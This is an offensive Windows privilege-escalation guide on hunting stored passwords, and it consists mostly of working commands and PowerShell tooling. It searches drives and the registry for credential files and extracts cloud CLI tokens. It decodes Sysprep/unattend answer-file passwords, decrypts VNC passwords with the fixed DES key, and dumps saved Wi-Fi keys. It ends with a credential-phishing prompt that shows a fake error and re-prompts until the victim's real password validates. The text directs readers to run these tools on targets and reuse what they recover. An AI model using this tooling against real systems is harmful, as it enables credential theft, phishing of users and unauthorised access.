# Hunting For Passwords

Low-hanging fruit such as plaintext passwords is often readable by a low-privileged user and can be abused to escalate privileges. One way to start is to dump a recursive listing of the system drive once and grep the file names in it (this matches names only, not file contents):

```
dir /b /a /s c:\ > c:\temp\c-dirs.txt
type c:\temp\c-dirs.txt | findstr /i passw
```

You can also replace `passw` with other keywords such as `ssh`, `vnc` or `cred`.

Interesting files that may contain sensitive information are the Sysprep/unattend answer files, which can carry the local administrator or auto-logon password left over from imaging:

```
C:\Windows\sysprep\sysprep.xml
C:\Windows\sysprep\sysprep.inf
C:\Windows\sysprep.inf
C:\Windows\Panther\Unattended.xml
C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Unattend\Unattend.xml
C:\Windows\Panther\Unattend\Unattended.xml
C:\Windows\System32\Sysprep\unattend.xml
C:\Windows\System32\Sysprep\unattended.xml
C:\unattend.txt
C:\unattend.inf
```

You can search for these files with (run from the root of the system drive, since `dir /s` only walks the current directory downwards):

```
dir /s *sysprep.inf *sysprep.xml *unattended.xml *unattend.xml *unattend.txt 2>nul
```
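Finding an answer file is only half the job; the password inside it is usually not in clear. The following is an added example, not code from the original page: `ConvertFrom-UnattendValue` decodes a `<Value>` the way Windows SIM writes it (base64 of the UTF-16LE password with the element name, `Password` or `AdministratorPassword`, appended; the suffix is only stripped when present, so hand-edited files still decode), `Get-UnattendPassword` pulls every `Password`/`AdministratorPassword` element out of a parsed answer file, and `Find-UnattendPassword` runs that over the XML locations listed above. The function names and the constructed sample answer file are my own; `sysprep.inf` is an INI file and is not handled here.

```powershell
function ConvertFrom-UnattendValue {
    # Decode one <Value> as Windows SIM / Sysprep writes it (see lead-in; assumption documented there).
    param([string]$Value, [bool]$PlainText, [string]$Element)
    if ($PlainText) { return $Value }
    $bytes = [Convert]::FromBase64String($Value.Trim())
    # Windows SIM writes UTF-16LE; hand-edited files sometimes hold base64 of plain UTF-8.
    $looksUtf16 = ($bytes.Length -ge 2) -and ($bytes.Length % 2 -eq 0) -and ($bytes[1] -eq 0)
    $decoded = if ($looksUtf16) { [System.Text.Encoding]::Unicode.GetString($bytes) } else { [System.Text.Encoding]::UTF8.GetString($bytes) }
    # Strip the appended element name ("Password" / "AdministratorPassword") if it is there.
    if ($decoded.EndsWith($Element)) { return $decoded.Substring(0, $decoded.Length - $Element.Length) }
    return $decoded
}

function Get-UnattendPassword {
    [CmdletBinding()]
    param([Parameter(Mandatory)][xml]$Document, [string]$Source = '<in-memory>')
    # local-name() sidesteps the urn:schemas-microsoft-com:unattend default namespace.
    $xpath = "//*[(local-name()='Password' or local-name()='AdministratorPassword') and *[local-name()='Value']]"
    foreach ($node in $Document.SelectNodes($xpath)) {
        $valueNode = $node.ChildNodes | Where-Object { $_.LocalName -eq 'Value' } | Select-Object -First 1
        $plainNode = $node.ChildNodes | Where-Object { $_.LocalName -eq 'PlainText' } | Select-Object -First 1
        $plain     = ($null -ne $plainNode) -and ($plainNode.InnerText.Trim() -eq 'true')
        # The account lives in the parent element: AutoLogon/Username, LocalAccount/Name,
        # or implicitly "Administrator" for UserAccounts/AdministratorPassword.
        $nameNode = $node.ParentNode.ChildNodes | Where-Object { $_.LocalName -in 'Username', 'Name' } | Select-Object -First 1
        $user = if ($nameNode) { $nameNode.InnerText.Trim() } elseif ($node.LocalName -eq 'AdministratorPassword') { 'Administrator' } else { $null }
        [pscustomobject]@{
            Source   = $Source
            Context  = $node.ParentNode.LocalName
            Username = $user
            Password = ConvertFrom-UnattendValue -Value $valueNode.InnerText -PlainText $plain -Element $node.LocalName
        }
    }
}

function Find-UnattendPassword {
    # The XML answer-file locations from the list above; sysprep.inf (INI format) is not parsed here.
    $candidates = @(
        "$env:SystemRoot\sysprep\sysprep.xml",
        "$env:SystemRoot\Panther\Unattended.xml",
        "$env:SystemRoot\Panther\Unattend.xml",
        "$env:SystemRoot\Panther\Unattend\Unattend.xml",
        "$env:SystemRoot\Panther\Unattend\Unattended.xml",
        "$env:SystemRoot\System32\Sysprep\unattend.xml",
        "$env:SystemRoot\System32\Sysprep\unattended.xml"
    )
    foreach ($file in $candidates) {
        if (-not (Test-Path -LiteralPath $file)) { continue }
        try { [xml]$doc = Get-Content -LiteralPath $file -Raw -ErrorAction Stop } catch { continue }
        Get-UnattendPassword -Document $doc -Source $file
    }
}

# Constructed sample (not a real answer file), encoded the way Windows SIM would.
$autoLogonEncoded = [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes('Passw0rd!' + 'Password'))
$localAcctEncoded = [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes('svc-pass' + 'Password'))
$sampleXml = @"
<unattend xmlns="urn:schemas-microsoft-com:unattend">
  <settings pass="oobeSystem">
    <component name="Microsoft-Windows-Shell-Setup">
      <AutoLogon>
        <Password><Value>$autoLogonEncoded</Value><PlainText>false</PlainText></Password>
        <Enabled>true</Enabled>
        <Username>Administrator</Username>
      </AutoLogon>
      <UserAccounts>
        <AdministratorPassword><Value>LocalAdm1n</Value><PlainText>true</PlainText></AdministratorPassword>
        <LocalAccounts>
          <LocalAccount>
            <Password><Value>$localAcctEncoded</Value><PlainText>false</PlainText></Password>
            <Name>svc_backup</Name>
          </LocalAccount>
        </LocalAccounts>
      </UserAccounts>
    </component>
  </settings>
</unattend>
"@
Get-UnattendPassword -Document ([xml]$sampleXml) -Source 'constructed-sample' | Format-Table -AutoSize
# On a target: Find-UnattendPassword | Format-Table -AutoSize
```

The demo returns one row per password element, with the base64 values decoded back to the constructed passwords and the plaintext one passed through unchanged. On a real host, run `Find-UnattendPassword` and try any recovered password against the local Administrator account and the named users.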

Other files worth looking for (the cloud CLI files live under each user's profile: `.aws` and `.azure` in `%USERPROFILE%`, `gcloud` in `%APPDATA%`):

```
VARIABLES.DAT
setupinfo
setupinfo.bak
web.config
SiteList.xml
.aws\credentials
.azure\accessTokens.json
.azure\azureProfile.json
gcloud\credentials.db
gcloud\legacy_credentials
gcloud\access_tokens.db
```
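The `dir`/`findstr` search above only matches file names, and the list of known files has to be checked per user profile. The following is an added example (not code from the original page) that does both in one pass: `Find-CredentialFiles` walks a root once, reports files whose name contains a keyword, greps the contents of config-like files for password keywords, and probes each user profile for the AWS/Azure/gcloud files listed above at their default locations. The function name, keyword lists, skipped directories and size limit are my own choices; tune them per engagement.

```powershell
function Find-CredentialFiles {
    [CmdletBinding()]
    param(
        [string]$Root = "$env:SystemDrive\",
        [string[]]$NameKeywords = @('passw', 'cred', 'secret', 'unattend', 'sysprep', 'id_rsa', '.kdbx'),
        [string[]]$ContentKeywords = @('password', 'passwd', 'pwd=', 'secret', 'apikey', 'api_key'),
        [string[]]$ContentExtensions = @('.txt', '.ini', '.xml', '.config', '.conf', '.json', '.ps1', '.bat', '.cmd', '.vbs', '.yml', '.yaml'),
        [string[]]$ExcludeDirs = @('\Windows\WinSxS', '\Windows\servicing', '\Windows\Installer', '\$Recycle.Bin'),
        [string]$ProfileRoot = "$env:SystemDrive\Users"
    )

    # Build case-insensitive regexes once; skip huge system directories that never hold user secrets.
    $excludeRegex = ($ExcludeDirs     | ForEach-Object { [regex]::Escape($_) }) -join '|'
    $nameRegex    = ($NameKeywords    | ForEach-Object { [regex]::Escape($_) }) -join '|'
    $contentRegex = ($ContentKeywords | ForEach-Object { [regex]::Escape($_) }) -join '|'

    # Walk the tree once (-Force includes hidden/system files, like "dir /a").
    $files = Get-ChildItem -Path $Root -Recurse -File -Force -ErrorAction SilentlyContinue |
        Where-Object { $_.FullName -notmatch $excludeRegex }

    # 1. File NAME contains a keyword (what "dir /s | findstr /i passw" does).
    foreach ($f in ($files | Where-Object { $_.Name -match $nameRegex })) {
        [pscustomobject]@{ Kind = 'name'; Path = $f.FullName; Detail = $f.Name }
    }

    # 2. File CONTENT contains a keyword, limited to config-like extensions and small files.
    $files | Where-Object { $_.Extension -in $ContentExtensions -and $_.Length -lt 5MB } |
        Select-String -Pattern $contentRegex -ErrorAction SilentlyContinue |
        ForEach-Object {
            [pscustomobject]@{ Kind = 'content'; Path = $_.Path; Detail = ('{0}: {1}' -f $_.LineNumber, $_.Line.Trim()) }
        }

    # 3. Well-known credential stores at their default per-profile locations.
    $knownRelative = @(
        '.aws\credentials',
        '.azure\accessTokens.json',
        '.azure\azureProfile.json',
        'AppData\Roaming\gcloud\credentials.db',
        'AppData\Roaming\gcloud\legacy_credentials',
        'AppData\Roaming\gcloud\access_tokens.db'
    )
    foreach ($userDir in (Get-ChildItem -Path $ProfileRoot -Directory -ErrorAction SilentlyContinue)) {
        foreach ($rel in $knownRelative) {
            $p = Join-Path -Path $userDir.FullName -ChildPath $rel
            if (Test-Path -LiteralPath $p) {
                [pscustomobject]@{ Kind = 'known'; Path = $p; Detail = $rel }
            }
        }
    }
}

# Whole drive (slow), or narrow it: Find-CredentialFiles -Root 'C:\Users' | Format-Table -AutoSize
Find-CredentialFiles | Format-Table -AutoSize
```

Hits of kind `content` carry the matching line, so obvious false positives (`PasswordPolicy`, documentation strings) can be discarded without opening the file; `known` hits should be copied out as-is, since the cloud CLIs will accept them from any machine.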

Sensitive passwords may also reside in the registry. `reg query /f` matches the search string against key names, value names and value data, and `/t REG_SZ` restricts hits to string values, so expect plenty of noise and check both hives (add `HKU` to cover other users' loaded hives):

```
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
```

We can also look for VNC credentials, PuTTY saved sessions and OpenSSH agent keys in the registry. SessionGopher (<https://raw.githubusercontent.com/Arvanaghi/SessionGopher/master/SessionGopher.ps1>) automates this for PuTTY, SuperPuTTY, WinSCP, FileZilla and RDP saved sessions. Note that the VNC values are only obfuscated (single DES under a fixed, public key) and the OpenSSH agent keys are DPAPI-protected for the user who added them, so both can be recovered in that user's context:

```
reg query "HKCU\Software\ORL\WinVNC3\Password"
reg query "HKCU\Software\TightVNC\Server"
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"
reg query "HKCU\Software\OpenSSH\Agent\Keys"
```
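The `Password` values under the VNC keys above are not hashes: the server encrypts the password (at most 8 characters, NUL-padded to 8 bytes) with DES-ECB under the RFB fixed key `{23,82,107,6,35,78,88,7}`, so reading the value is as good as reading the password. The following is an added example, not code from the original page: the key is written with the bits of each byte reversed (`E8 4A D6 60 C4 72 1A E0`), which is the form standard DES implementations such as .NET's expect, `Unprotect-VncPassword` decrypts a blob, `Protect-VncPassword` exists only so the demo can round-trip a constructed password offline, and `Get-VncRegistryPassword` reads the registry locations queried above (value names and locations vary between VNC products; the list is my assumption, extend it as needed).

```powershell
# RFB fixed key {23,82,107,6,35,78,88,7}, bit-reversed per byte for .NET's DES.
$VncFixedKey = [byte[]](0xE8, 0x4A, 0xD6, 0x60, 0xC4, 0x72, 0x1A, 0xE0)

function New-VncDes {
    $des = [System.Security.Cryptography.DES]::Create()
    $des.Mode    = [System.Security.Cryptography.CipherMode]::ECB
    $des.Padding = [System.Security.Cryptography.PaddingMode]::None
    $des.Key     = $VncFixedKey
    return $des
}

function Unprotect-VncPassword {
    param([Parameter(Mandatory)][byte[]]$Blob)
    if ($Blob.Length -lt 8) { throw 'VNC password blob must be at least 8 bytes' }
    $plain = (New-VncDes).CreateDecryptor().TransformFinalBlock($Blob, 0, 8)
    # The stored password is NUL-padded to one DES block.
    return ([System.Text.Encoding]::ASCII.GetString($plain)).TrimEnd([char]0)
}

function Protect-VncPassword {
    # Demo helper only: mirrors what the server does when it saves a password.
    param([Parameter(Mandatory)][string]$Password)
    $buf   = New-Object byte[] 8
    $bytes = [System.Text.Encoding]::ASCII.GetBytes($Password)
    [Array]::Copy($bytes, $buf, [Math]::Min(8, $bytes.Length))   # VNC truncates to 8 characters
    return (New-VncDes).CreateEncryptor().TransformFinalBlock($buf, 0, 8)
}

function Get-VncRegistryPassword {
    # Locations matching the reg query commands above (assumed value names; extend per product).
    $targets = @(
        @{ Key = 'HKCU:\Software\ORL\WinVNC3';     Name = 'Password' },
        @{ Key = 'HKLM:\SOFTWARE\ORL\WinVNC3';     Name = 'Password' },
        @{ Key = 'HKCU:\Software\TightVNC\Server'; Name = 'Password' },
        @{ Key = 'HKLM:\SOFTWARE\TightVNC\Server'; Name = 'Password' },
        @{ Key = 'HKLM:\SOFTWARE\RealVNC\WinVNC4'; Name = 'Password' }
    )
    foreach ($t in $targets) {
        $item = Get-ItemProperty -Path $t.Key -Name $t.Name -ErrorAction SilentlyContinue
        if ($null -eq $item) { continue }
        $blob = $item.($t.Name)
        if ($blob -is [byte[]]) {
            [pscustomobject]@{
                Key      = $t.Key
                Hex      = ($blob | ForEach-Object { $_.ToString('x2') }) -join ''
                Password = Unprotect-VncPassword -Blob $blob
            }
        }
    }
}

# Offline demo on constructed data: encrypt a known password, then decrypt it again.
$sample = Protect-VncPassword -Password 'S3cr3t!'
'{0} -> {1}' -f (($sample | ForEach-Object { $_.ToString('x2') }) -join ''), (Unprotect-VncPassword -Blob $sample)
# On a target: Get-VncRegistryPassword | Format-Table -AutoSize
```

The same decryption applies to `~/.vnc/passwd` files on Unix hosts and to the `PasswordViewOnly` value where a product stores one; only the first 8 bytes of the blob are meaningful.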

Saved Wi-Fi profiles hold the pre-shared key, and `netsh` can print it in cleartext. Users reuse these passwords for other accounts, so collect all of them. The loop below lists every profile, then shows each one with `key=clear`; the inner `for` trims the leading space from the profile name so SSIDs containing spaces work (double the `%` signs if you put this in a batch file):

```
for /f "tokens=2 delims=:" %a in ('netsh wlan show profiles ^| findstr /c:"Profile "') do @for /f "tokens=*" %b in ("%a") do @(netsh wlan show profile name="%b" key=clear | findstr /c:"SSID name" /c:"Authentication" /c:"Cipher" /c:"Key Content")
```

## Credential Popup

If enumeration turns up nothing, you can simply ask: spawn a Windows-style credential prompt and hope the user types their password into it. The PoC below (from greg.foss / enigma0x3) first shows a fake error box as a pretext, then prompts for credentials and validates them against the local machine context, re-prompting on failure so that only working credentials are returned:

```
#   POC from greg.foss[at]owasp.org
#   @enigma0x3
# Adapted from http://blog.logrhythm.com/security/do-you-trust-your-computer/
# https://enigma0x3.wordpress.com/2015/01/21/phishing-for-credentials-if-you-want-it-just-ask/

function Invoke-Prompt {
    [CmdletBinding()]
    Param (
        [Switch] $ProcCreateWait,
        [String] $MsgText = 'Lost contact with the Domain Controller.',
        [String] $IconType = 'Critical',
        [String] $Title = 'ERROR - 0xA801B720'
    )
    Add-Type -AssemblyName Microsoft.VisualBasic
    Add-Type -AssemblyName System.DirectoryServices.AccountManagement
    # Used to check that whatever the victim typed actually works before reporting it.
    $DS = New-Object System.DirectoryServices.AccountManagement.PrincipalContext([System.DirectoryServices.AccountManagement.ContextType]::Machine)

    # Optional pretext: a system-modal error box shown before the credential prompt.
    if($MsgText -and $($MsgText -ne '')){
        $null = [Microsoft.VisualBasic.Interaction]::MsgBox($MsgText, "OKOnly,MsgBoxSetForeground,SystemModal,$IconType", $Title)
    }

    # Pre-fill the prompt with the current DOMAIN\user so the victim only has to type a password.
    $c = [System.Security.Principal.WindowsIdentity]::GetCurrent().Name
    $credential = $host.ui.PromptForCredential("Credentials Required", "Please enter your user name and password.", $c, "NetBiosUserName")

    if($credential){
        # Keep re-prompting until the password validates; bail out if the user cancels.
        while($DS.ValidateCredentials($c, $credential.GetNetworkCredential().Password) -ne $True){
            $credential = $Host.ui.PromptForCredential("Windows Security", "Invalid Credentials, Please try again", "$env:userdomain\$env:username", "")
            if(-not $credential){ return "[!] User closed credential prompt" }
        }
        "[+] Prompted credentials: -> " + $c + ":" + $credential.GetNetworkCredential().Password
    }
    else{
        "[!] User closed credential prompt"
    }
}
```

